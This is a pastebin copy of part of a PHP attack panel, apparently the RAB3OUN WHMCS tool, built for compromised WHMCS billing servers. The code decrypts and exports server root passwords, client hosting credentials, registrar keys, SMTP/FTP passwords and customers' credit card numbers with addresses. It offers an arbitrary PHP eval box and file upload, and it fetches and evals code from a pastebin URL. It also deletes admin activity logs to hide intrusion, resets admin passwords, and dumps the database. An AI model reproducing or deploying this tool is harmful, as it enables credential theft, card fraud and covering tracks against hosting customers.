  1139. }if($_POST["export"]==1){$query=mysql_query("SELECT * FROM tblservers");
  1140. $textr=$textr."
  1141. ######################### HOST ROOTS ###########################
  1142. ";
  1143. while($v=mysql_fetch_array($query)){$ipaddress=$v["ipaddress"];
  1144. $username=$v["username"];
  1145. $type=$v["type"];
  1146. $active=$v["active"];
  1147. $hostname=$v["hostname"];
  1148. $accesshash=$v["accesshash"];
  1149. $password=decrypt($v["password"],$cc_encryption_hash);
  1150. $textr=$textr."Type $type
  1151. ";
  1152. $textr=$textr."Active $active
  1153. ";
  1154. $textr=$textr."Hostname $hostname
  1155. ";
  1156. $textr=$textr."Ip $ipaddress
  1157. ";
  1158. if($accesshash)$textr=$textr."Accesshash $accesshash
  1159. ";
  1160. $textr=$textr."Username $username
  1161. ";
  1162. $textr=$textr."Password $password
  1163. **************************************
  1164. ";
  1165. }$textr=$textr."
  1166. ######################### HOST ROOTS ###########################
  1167. ";
  1168. @ob_end_clean();
  1169. header("Content-length: ".strlen($textr));
  1170. header("Content-type: text/plain");
  1171. header("Content-Disposition: attachment;
  1172.  
  1173.  filename=".$_SERVER["HTTP_HOST"]."-host_R00t.txt");
  1174. echo($textr);
  1175. exit;
  1176. }break;
  1177. case 2:$query=mysql_query("SELECT * FROM tblregistrars");
  1178. if(!is_array(mysql_fetch_array($query))){echo"<p class=\"msg error\">Nothing Found !</p>";
  1179. }else{$i=0;
  1180. $query=mysql_query("SELECT * FROM tblregistrars");
  1181. echo("<center><h1>Domain Reseller</h1> <br><table border='0'>");
  1182. while($v=mysql_fetch_array($query)){if($v["registrar"]<>$last)echo"<TR><Th COLSPAN=2><center>".ucfirst($v["registrar"])."</center></th></TR>";
  1183. $last=$v["registrar"];
  1184. $value=decrypt($v["value"],$cc_encryption_hash);
  1185. if($value==""){$value=0;
  1186. }$password=decrypt($v["password"],$cc_encryption_hash);
  1187. if($i%2==0){$bg="class=\"bg\"";
  1188. }else{$bg="";
  1189. }echo("<tr $bg><td  >  ".$v["setting"]." </td><td>$value</td></tr>");
  1190. $i++;
  1191. }echo"</table><br><br></center>";
  1192. }break;
  1193. case 99:@ob_end_clean();
  1194. actionSql();
  1195. exit;
  1196. break;
  1197. case 100:multiview(100,"tblclients","Clients </h1></center><br><p class='msg info'>Click on id to get all info+Hosting Accounts+Tickets</p><center>","id desc",array("email","companyname","country","firstname","lastname"),array("ID","Companyname","Email","Country","Firstname","lastname"),array("id","companyname","email","country","firstname","lastname"));
  1198. break;
  1199. case 101:echo("<center><h1>Eval PHP</h1><br><br>");
  1200. Echo"<form action='?p=101' method='POST' > <textarea rows='10' name='pp' cols='50'>  </textarea><br /><input type='submit' value='Go' name='go' /></form></html>";
  1201. $cod=$_POST["pp"];
  1202. $send=$_POST["go"];
  1203. if($send){eVaL(stripslashes($cod));
  1204. }break;
  1205. case 102:$ch=@curl_init();
  1206. @curl_setopt($ch,CURLOPT_URL,"http://pastebin.com/download.php?i=feUTTgeL");
  1207. @curl_setopt($ch,CURLOPT_HEADER,0);
  1208. @curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
  1209. @curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  1210. @curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  1211. @curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1;
  1212.  WOW64;
  1213.  rv:12.0) Gecko/20100101 Firefox/12.0");
  1214. $result=@curl_exec($ch);
  1215. @curl_close($ch);
  1216. echo("<h3  class=\"tit\">Info </h3><p class='msg info'>Coded by RAB3OUN <br>
  1217. Mail v.b-4@hotmail.com rab3oun.net@gmail.com<br>
  1218. Blog <a href='http://www.rab3oun.net'>http://www.rab3oun.net</a></p> Curent version is V3 ;
  1219.  ");
  1220. @eval($result);
  1221. echo("<br>
  1222.  <p class='msg warning'>Disclaimer <br> THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES.
  1223. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
  1224. <br> IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
  1225. <br> THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
  1226. <br> USE IT UNDER YOUR OWN RISK!!!!!! THANKS.</p>
  1227.  
  1228.  <br>
  1229. <center><h3  class=\"tit\">Greets:</h3></center>
  1230. <b>Ahwak2000</b> RENO <br>
  1231.  All Sec4ever TEAM
  1232. ");
  1233. echo"<center><h3 class=\"tit\">Donate ^_^</h3></center>";
  1234. echo"<br> Donate by  Libertyreserve <a href=\"https://sci.libertyreserve.com/en?lr_acc=U0861977&lr_currency=LRUSD\" alt=\"Pay With Liberty Reserve!\"> <img src=\"https://www.libertyreserve.com/downloads/banners/accept.gif\" alt=\"LR\" border=\"0\"/></a>";
  1235. break;
  1236. case 3:multiview(3,"tblhosting","Client R00ts</h1></center><br><p class='msg info'>There is no table dedicated to client root.<br>
  1237.             The Script find in the table where username = vmuserxxx, root , Admin , admin , Administrator , administrator </p><br><center>","domainstatus",array("dedicatedip","ns1","ns2","username","domain"),array("Domain","Dedicatedip","User","Pass","Domainstatus","Client ID","Server ID","Notes"),array("domain","dedicatedip","username","password","domainstatus","userid","server","notes"),1,"(username like 'vmuser%' or  username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or  username = 'administrator') and ");
  1238. if($_POST["export"]==1){$textr=$textr."
  1239. ######################### Client R00ts ###########################
  1240. ";
  1241. $query=mysql_query("SELECT * FROM tblhosting where  username like 'vmuser%' or username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or  username = 'administrator' order by domainstatus");
  1242. while($v=mysql_fetch_array($query)){$textr=$textr."
  1243. Domain ".$v["domain"]."
  1244. IP ".$v["dedicatedip"]."
  1245. Username ".$v["username"]."
  1246. Password ".decrypt($v["password"],$cc_encryption_hash)."
  1247. Domainstatus".$v["domainstatus"]."
  1248. ";
  1249. }$textr=$textr."
  1250. ######################### Client R00ts ###########################
  1251. ";
  1252. @ob_end_clean();
  1253. header("Content-length: ".strlen($textr));
  1254. header("Content-type: text/plain");
  1255. header("Content-Disposition: attachment;
  1256.  
  1257.  filename=".$_SERVER["HTTP_HOST"]."-client_R00t.txt");
  1258. echo($textr);
  1259. exit;
  1260. }break;
  1261. case 4:multiview(4,"tblhosting","Clients Hosting Accounts","domainstatus",array("dedicatedip","ns1","ns2","username","domain"),array("Domain","Dedicatedip","User","Pass","Domainstatus","Client ID","Server ID","Notes"),array("domain","dedicatedip","username","password","domainstatus","userid","server","notes"),1);
  1262. if($_POST["export"]=="1"){$text=$text."
  1263. ######################### Client HOST ###########################
  1264. ";
  1265. $query=mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");
  1266. while($v=mysql_fetch_array($query)){if(($v["username"])and($v["password"])){$textr=$textr."
  1267. Domain ".$v["domain"]."
  1268. IP ".$v["dedicatedip"]."
  1269. Username ".$v["username"]."
  1270. Password ".decrypt($v["password"],$cc_encryption_hash)."
  1271. Domainstatus ".$v["domainstatus"]."
  1272. ";
  1273. }}$textr=$textr."
  1274. ######################### Client HOST ###########################
  1275. ";
  1276. @ob_end_clean();
  1277. header("Content-length: ".strlen($textr));
  1278. header("Content-type: text/plain");
  1279. header("Content-Disposition: attachment;
  1280.  
  1281.  filename=".$_SERVER["HTTP_HOST"]."-client_host.txt");
  1282. echo($textr);
  1283. exit;
  1284. }break;
  1285. case 5:$query=mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc");
  1286. if(!is_array(mysql_fetch_array($query))){echo"<h1>Clients CC</h1><br><p class=\"msg error\">Nothing Found !</p>";
  1287. }else{$query=mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc");
  1288. echo("<table border=1><tr><td>cardtype</td><td>cardnum</td><td>expdate</td><td>issuenumber</td><td>Country</td><td>Firstname</td><td>Lastname</td><td>Address1</td><td>City</td><td>State</td><td>Postcode</td><td>phonenumber</td><td>Email</td></tr>");
  1289. while($v=mysql_fetch_array($query)){$cchash=md5($cc_encryption_hash.$v["0"]);
  1290. $s=mysql_query("select cardtype,AES_DECRYPT(cardnum,'
  1291. {
  1292. $cchash}
  1293. ') as cardnum,AES_DECRYPT(expdate,'
  1294. {
  1295. $cchash}
  1296. ') as expdate,AES_DECRYPT(issuenumber,'
  1297. {
  1298. $cchash}
  1299. ') as issuenumber,AES_DECRYPT(startdate,'
  1300. {
  1301. $cchash}
  1302. ') as startdate,country,email,firstname,lastname,address1,city,state,postcode,phonenumber  FROM `tblclients` where id='".$v["0"]."'  order by country");
  1303. $country=$v["country"];
  1304. $email=$v["email"];
  1305. $firstname=$v["firstname"];
  1306. $lastname=$v["lastname"];
  1307. $address1=$v["address1"];
  1308. $city=$v["city"];
  1309. $state=$v["state"];
  1310. $postcode=$v["postcode"];
  1311. $phonenumber=$v["phonenumber"];
  1312. $v2=mysql_fetch_array($s);
  1313. echo("<tr><td>".$v2[0]."</td><td>".$v2[1]."</td><td>".$v2[2]."</td><td>".$v2[4]."</td><td>$country</td><td> $firstname</td><td>$lastname</td><td>$address1</td><td>$city</td><td>$state</td><td>$postcode</td><td>$phonenumber</td><td>$email</td></tr>");
  1314. }echo("</table>");
  1315. }break;
  1316. case 63:$qq=$_GET["qq"];
  1317. $q=str_replace(" ","%",$_POST["q"]);
  1318. if($qq<>"")$q=$qq;
  1319. if($q=="")$q="%";
  1320. if($qq=="")$qq=$q;
  1321. echo("<center><h1>Clients Tickets</h1><br><br><h3 class=\"tit\" >Search</h3><br><FORM action=\"?p=63\"  method=\"post\">
  1322. <input type=\"text\" name=\"q\" value=\"".$q."\">
  1323. <br>
  1324. <INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\"> <br>ex: root%pass or  root or 2086
  1325. ");
  1326. if(isset($_GET["page"])){$page=intval($_GET["page"]);
  1327. }else{$page=1;
  1328. }$start_from=($page-1)*100;
  1329. $query=mysql_query(" select id as tid,date FROM tbltickets  where message LIKE '%".$q."%' union SELECT  tid,date FROM `tblticketreplies` where message LIKE '%".$q."%' order by date desc");
  1330. while($vv=@mysql_fetch_array($query)){$list_tid0[]=$vv["tid"];
  1331. }$list_tid=@array_values(array_unique($list_tid0));
  1332. $total_records=count($list_tid);
  1333. if($total_records==0)exit;
  1334. echo("<h3  class=\"tit\">Total Records ".$total_records."</h3><br>");
  1335. $total_pages=ceil($total_records/50);
  1336. echo("<br><table border='0'><tr >");
  1337. echo("<th>Page ".$page." Of ".$total_pages."</th>");
  1338. if($page>1)echo"<th><a href='?p=63&qq=".$qq."&page=".($page-1)."'>Back</a>&nbsp</th>";
  1339. echo"<th><a href='?p=63&qq=".$qq."&page=".$total_pages."'>Latest</a></th>";
  1340. if($page<$total_pages)echo"<th>&nbsp<a href='?p=63&qq=".$qq."&page=".($page+1)."'>Next</a>&nbsp</th>";
  1341. for($i=0;
  1342. $i<=$total_pages;
  1343. $i++){if($i%2==0){$bg2="class=\"bg2\"";
  1344. }else{$bg2="";
  1345. }if($i%20==0)echo"</tr><tr>";
  1346. if($i==0){echo"<td>&nbsp&nbsp</td>";
  1347. }else{if($i==$page){echo"<td $bg2>&nbsp<a href='?p=63&qq=".$qq."&page=".$i."'>(".$i.")</a>&nbsp</td>";
  1348. }else{echo"<td $bg2>&nbsp<a href='?p=63&qq=".$qq."&page=".$i."'>".$i."</a>&nbsp</td>";
  1349. }}}echo("</tr></table>");
  1350. for($i=$start_from;
  1351. $i<($start_from+50);
  1352. $i++){$query1=mysql_query("SELECT * FROM tbltickets  where id='".$list_tid[$i]."'");
  1353. while($v=mysql_fetch_array($query1)){echo("<br><br><h3  class=\"tit\">Ticket ID ".$v["id"]."</h3><br><br>");
  1354. $query2=mysql_query("select * from  tblticketnotes where ticketid='".$v["id"]."'");
  1355. while($v2=mysql_fetch_array($query2)){echo"</center><p class=\"msg info\">Tickets notes:".$v2["message"].".</p><center>";
  1356. }echo("<table border=1><tr><th><table width=100% border=1><th><th>".$v["title"]."</th><th>".$v["date"]."]</th><th>User id <a href='?p=12&id=".$v["userid"]."'><font color=\"#FFF\" >".$v["userid"]."</font></a></th><th>Ticket ID ".$v["id"]."</th></tr></table></th></tr>");
  1357. if($v["attachment"]){echo("<tr><td>".($v["message"])."<br>-----------<br>Attachment<br>".($v["attachment"])."</td></tr>");
  1358. }else{echo("<tr><td>".($v["message"])."</td></tr>");
  1359. }$query2=mysql_query("select * from tblticketreplies where tid='".$v["id"]."'");
  1360. while($v2=mysql_fetch_array($query2)){if($v2["admin"]){echo("<tr class='bg'><td> By ".$v2["admin"]."</td></tr><tr class='bg'><td>".nl2br(str_replace($qq,"<span class='tag'>$qq</span>",$v2["message"]))." <br>-----------<br>Attachment<br>".($v2["attachment"])."</td></tr>");
  1361. }else
  1362. echo("<tr><td> By Client </td></tr><tr><td>".nl2br($v2["message"])." <br>-----------<br>Attachment<br>".nl2br($v2["attachment"])."</td></tr>");
  1363. }echo("</table>");
  1364. }}break;
  1365. case 7:echo("<center><h1>FTP and SMTP password</h1>");
  1366. table("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or  setting='FTPBackupPassword' or  setting='FTPBackupDestination' or  setting='SMTPHost' or  setting='SMTPUsername' or setting='SMTPPassword' or  setting='SMTPPort' or setting='MailType'",array("setting","value"));
  1367. break;
  1368. case 8:switch($_GET["page"]){case"1":echo"<center><h1>File Upload</h1><br><br><form method=\"POST\" action=\"?p=8\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"upload\"></form>";
  1369. break;
  1370. case"2":echo"<hr><center><h1>Delete Adminlog</h1><br><form method=\"POST\" action=\"?p=8\" ><input type=\"text\" name=\"ip\" value=\"".$_SERVER["REMOTE_ADDR"]."\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"ip\"></form>";
  1371. break;
  1372. case"3":echo"<hr><center><h1>Change Admin Password to 123456</h1><br><form method=\"POST\" action=\"?p=8\" ><h3 class=\"tit\">Admin ID:</h3><input type=\"text\" name=\"idd\" value=\"1\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"cpa\"></form>";
  1373. break;
  1374. case"4":echo"<hr><center><h1>Change Client Password to 123456</h1><br><form method=\"POST\" action=\"?p=8\" ><h3 class=\"tit\">Mail:</h3><input type=\"text\" name=\"mail\" value=\"client@mail.com\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"cpc\"></form>";
  1375. break;
  1376. case"5":echo"<hr><center><h1>Change Client Mail</h1><br><form method=\"POST\" action=\"?p=8\" ><h3 class=\"tit\">Client ID:</h3><input type=\"text\" name=\"id\" value=\"\"><h3 class=\"tit\">Client Mail:</h3><input type=\"text\" name=\"mail\" value=\"\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"f\" value=\"ccm\"></form>";
  1377. break;
  1378. case"6":echo("<hr>
  1379. <h1> Decrypt Password</h1>
  1380. <FORM action=\"?p=8\"  method=\"post\">
  1381. <input type=\"hidden\" name=\"f\" value=\"dec\">
  1382. <br>
  1383. <table border=1>
  1384.  
  1385. <tr><td>Password</td><td><input type=\"text\" size=\"30\" name=\"password\" value=\"\"></td></tr>
  1386. <tr><td>cc_encryption_hash</td><td><input type=\"text\" size=\"30\" name=\"cc_encryption_hash\" value=\"\"></td></tr>
  1387.  
  1388. </table>
  1389. <br>
  1390. <INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\">
  1391. </FORM>
  1392. <hr>");
  1393. break;
  1394. }if($_POST["f"]=="dec"){$password=($_POST["password"]);
  1395. $cc_encryption_hash=($_POST["cc_encryption_hash"]);
  1396. $password=decrypt($password,$cc_encryption_hash);
  1397. echo("<h1>Password is ".$password."</h1>");
  1398. }if($_POST["f"]=="upload"){$filedir="";
  1399. $maxfile="2000000000";
  1400. $userfile_name=$_FILES["image"]["name"];
  1401. $userfile_tmp=$_FILES["image"]["tmp_name"];
  1402. if(isset($_FILES["image"]["name"])){$abod=$filedir.$userfile_name;
  1403. @move_uploaded_file($userfile_tmp,$abod);
  1404. echo"<p class=\"msg done\">Done ==> $userfile_name</p>";
  1405. }}if($_POST["f"]=="ip"){$tryChaning=mysql_query("DELETE FROM tbladminlog where ipaddress='".$_POST["ip"]."'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1406. $tryChaning=mysql_query("DELETE FROM   tblactivitylog where     ipaddr='".$_POST["ip"]."'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1407. if($tryChaning){echo("<p class=\"msg done\"><br>Last adminlog successfully deleted</p>");
  1408. }else{echo("<p class=\"msg info\"><br>Deleteing adminlog error</p>");
  1409. }}if($_POST["f"]=="cpa"){$tryChaningInfo=mysql_query("UPDATE tbladmins SET password = 'e10adc3949ba59abbe56e057f20f883e' where id='".$_POST["idd"]."'")or die("Erreur SQL !".$sql."<br>".mysql_error());
  1410. if($tryChaningInfo){echo("<p class=\"msg done\"><br>[+] Changing admin password to 123456</p>");
  1411. }else{echo("<p class=\"msg info\"><br>[-] Changing admin password error</p>");
  1412. exit;
  1413. }}if($_POST["f"]=="cpc"){$tryChaningInfo=mysql_query("UPDATE tblclients SET password = '760d0530440ec45a2c3dc8b38dee8e9a:%ME)v' where email='".$_POST["mail"]."'");
  1414. if($tryChaningInfo){echo("<p class=\"msg done\"><br>[+] Changing client ".$_POST["mail"]." password to 123456</p>");
  1415. }else{echo("<p class=\"msg info\"><br>[-] Changing client password error</p>");
  1416. exit;
  1417. }}if($_POST["f"]=="ccm"){$tryChaningInfo=mysql_query("UPDATE tblclients SET email = '".$_POST["mail"]."' where id='".$_POST["id"]."'");
  1418. if($tryChaningInfo){echo("<p class=\"msg done\"><br>[+] Changing client ".$_POST["id"]." mail to ".$_POST["mail"]."</p>");
  1419. }else{echo("<p class=\"msg info\"><br>[-] Changing client password error</p>");
  1420. exit;
  1421. }}break;
  1422. case 9:foreach($_COOKIE as$name=>$value){setcookie($name,"");
  1423. }echo("<meta http-equiv='refresh' content='1;
  1424. URL=?' />");
  1425. break;
  1426. default:if($_COOKIE["login"]=="1"){echo("<meta http-equiv='refresh' content='1;
  1427. URL=?p=1' />");
  1428. }else{@ob_end_clean();
  1429. login();
  1430. }break;
  1431. case 11:echo"<center><h1>Backup</h1></center><br>";
  1432. $link=mysql_connect($db_host,$db_username,$db_password);
  1433. mysql_select_db($db_name,$link);
  1434. $do=$_POST["action"];
  1435. if($do=="yes"){error_reporting(E_ALL^E_NOTICE);
  1436. @ini_set("memory_limit",32*1024*1024);
  1437. @ini_set("max_execution_time","480");
  1438. $tables=$_POST["tablen"];
  1439. foreach($tables as$table){$query=@mysql_query("SHOW CREATE TABLE ".$table);
  1440. $que=@mysql_fetch_array($query);
  1441. $outta.=$que["Create Table"].";
  1442.  
  1443.  
  1444. ";
  1445. $outta.="
  1446. ";
  1447. $query=mysql_query("select * from ".$table);
  1448. $num_fields=mysql_num_fields($query);
  1449. $numrow=mysql_num_rows($query);
  1450. while($row=mysql_fetch_array($query)){$outta.="INSERT INTO ".$table." VALUES(";
  1451. for($j=0;
  1452. $j<$num_fields;
  1453. $j++){$row[$j]=addslashes($row[$j]);
  1454. $row[$j]=str_replace("
  1455. ","
  1456. ",$row[$j]);
  1457. $row[$j]=str_replace("
  1458. ","",$row[$j]);
  1459. if(isset($row[$j]))$outta.="'$row[$j]'";
  1460. else$outta.="";
  1461. if($j<($num_fields-1))$outta.=", ";
  1462. }$outta.=");
  1463.  
  1464.  
  1465. ";
  1466. }$outta.="
  1467. ";
  1468. }$date=time();
  1469. @ob_end_clean();
  1470. header("Content-length: ".strlen("-- --------WHMCS BACKUP ----------------
  1471.     -- host:".$db_host."
  1472.     -- username:".$db_username."
  1473.     -- password:".$db_password."
  1474.     -- cc_hash:".$_COOKIE["cc_encryption_hash"]."
  1475. -- ------------------------------
  1476. ".$outta));
  1477. header("Content-type: text/plain");
  1478. header("Content-Disposition: attachment;
  1479.  
  1480.  filename=".$_SERVER["HTTP_HOST"]."-$date.sql");
  1481. echo"-- --------WHMCS BACKUP ----------------
  1482.     -- host:".$db_host."
  1483.     -- username:".$db_username."
  1484.     -- password:".$db_password."
  1485.     -- cc_hash:".$_COOKIE["cc_encryption_hash"]."
  1486. -- ------------------------------
  1487. ".$outta;
  1488. }echo"<script language=\"JavaScript\">
  1489.  function checkAll(form)
  1490. {
  1491.   for (var i = 1;
  1492.  i < form.elements.length;
  1493.  i++)
  1494. {
  1495.    eval(\"form.elements[\" + i + \"].checked = form.elements[1].checked\");
  1496.  
  1497.   }
  1498. }
  1499. </script>";
  1500. $tables=@mysql_query("SHOW TABLE STATUS");
  1501. echo"<center><form name=\"formw\" method=\"post\">
  1502.  
  1503. <input name=\"action\" type=\"hidden\" value=\"yes\">
  1504.  
  1505. <table width=\"280\" border=\"1\" align=\"center\" cellpadding=\"4\" cellspacing=\"0\" >
  1506.  
  1507.     <tr>
  1508.  
  1509.       <th align=\"center\" height=\"28\" width=\"35\"><input name=\"tablenall\" type=\"checkbox\" checked=\"checked\" onClick=\"checkAll(this.form)\"/></th>
  1510.  
  1511.       <th align=\"center\" width=\"130\">Tabel Name</th>
  1512.  
  1513.       <th width=\"100\"><div align=\"center\">Size</div></th>
  1514.  
  1515.     </tr>";
  1516. while($table=@mysql_fetch_array($tables)){$size=round($table["Data_length"]/1024,2);
  1517. echo" <tr><td>";
  1518. echo"<input type=\"checkbox\" name=\"tablen[]\" value=\"$table[Name]\" checked=\"checked\" />";
  1519. echo"</td>
  1520.  
  1521.       <td><b>";
  1522. echo$table[Name];
  1523. echo"</b></td>
  1524.  
  1525.       <td><div align=\"center\"> kb <b>";
  1526. echo$size;
  1527. echo"</b></div></td>
  1528.  
  1529.     </tr>";
  1530. }echo"
  1531. </table> <br>
  1532.  
  1533. <center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[download backup ]\" /></center>
  1534.  
  1535. </form>";
  1536. break;
  1537. case 12:if($_GET["m"]){$query1=mysql_query("SELECT * FROM tblemails where id='".$_GET["m"]."'");
  1538. $v=mysql_fetch_array($query1,true);
  1539. echo($v["subject"]);
  1540. echo("<br>");
  1541. echo($v["message"]);
  1542. exit;
  1543. }echo"<center><h1>Client id ".$_GET["id"]."</h1><br>";
  1544. echo("<h3 class=\"tit\">Info</h3></center>");
  1545. echo"<ul>
  1546.  <li><a href='#t'>Client Tickets</a><li>
  1547.  <li><a href='#h'>Client Hosts</a><li>
  1548.  <li><a href='#m'>Client mails</a><li>
  1549.  </ul>";
  1550. $query1=mysql_query("SELECT * FROM tblclients where id='".$_GET["id"]."'");
  1551. $v=mysql_fetch_array($query1,true);
  1552. if($v){echo"<center><table>";
  1553. $i=0;
  1554. foreach($v as$x=>$y){if($i%2==0){$bg="class=\"bg\"";
  1555. }else{$bg="";
  1556. }echo"<tr $bg><td>$x</td><td>$y</td></tr>";
  1557. $i++;
  1558. }echo("</table><br>");
  1559. }echo"<h1 id='t'>Client Tickets</h1></center><br><ul>";
  1560. $query=mysql_query("SELECT * FROM tbltickets where userid='".$_GET["id"]."'");
  1561. while($v=mysql_fetch_array($query)){echo"<li><a href='#t".$v["id"]."'>".$v["id"]." ".$v["title"]."</a></li><br>";
  1562. }echo"</ul>";
  1563. $query=mysql_query("SELECT * FROM tbltickets where userid='".$_GET["id"]."'");
  1564. while($v=mysql_fetch_array($query)){echo("<br><br><center><h3  id='t".$v["id"]."' class=\"tit\">Ticket ID ".$v["id"]."</h3></center><br><br>");
  1565. echo("<center><table border=1>");
  1566. echo("<tr><th>".$v["title"]."<br>".$v["date"]."</th></tr>");
  1567. echo("<tr><td>".($v["message"])."</td></tr>");
  1568. $query2=mysql_query("select * from tblticketreplies where tid='".$v["id"]."'");
  1569. while($v2=mysql_fetch_array($query2)){if($v2["admin"]){echo("<tr class='bg' ><td>".nl2br($v2["message"])."</td></tr>");
  1570. }else{echo("<tr $bg ><td>".nl2br($v2["message"])."</td></tr>");
  1571. }}echo("</table><br><br>");
  1572. }echo("<h1 id='h'>Client Hosts</h1><br><br>");
  1573. table("SELECT * FROM tblhosting  where userid='".$_GET["id"]."'",array("domain","domainstatus","username","password","notes"));
  1574. echo("<h1 id='m'>Client mails</h1><br><br>");
  1575. $query=mysql_query("SELECT * FROM tblemails  where userid='".$_GET["id"]."'");
  1576. if(mysql_fetch_array($query)){echo("<table><tr><th>Subject</th><th>Date</th></tr>");
  1577. $i=0;
  1578. while($v=mysql_fetch_array($query)){if($i%2==0){$bg="class=\"bg\"";
  1579. }else{$bg="";
  1580. }echo("<tr $bg><td><a href='?p=12&id=".$_GET["id"]."&m=".$v["id"]."'>".$v["subject"]."</a></td><td>".$v["date"]."</td></tr>");
  1581. $i++;
  1582. }echo("</table>");
  1583. }else{echo"<p class=\"msg error\">Nothing Found !</p>";
  1584. }break;
  1585. }echo"      </div>
  1586.     </div> <!-- /cols -->
  1587.     <hr class=\"noscreen\" />
  1588.     <!-- Footer -->
  1589.     <div id=\"footer\" class=\"box\">
  1590.         <p class=\"f-left\">Coded by <a href=\"http://www.rab3oun.net\">RAB3OUN</a>, </p>
  1591.         <p class=\"f-right\">Templates by Adminizio</p>
  1592.     </div> <!-- /footer -->
  1593. </div> <!-- /main -->
  1594. </body>
  1595. </html>";
  1596.  
  1597. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top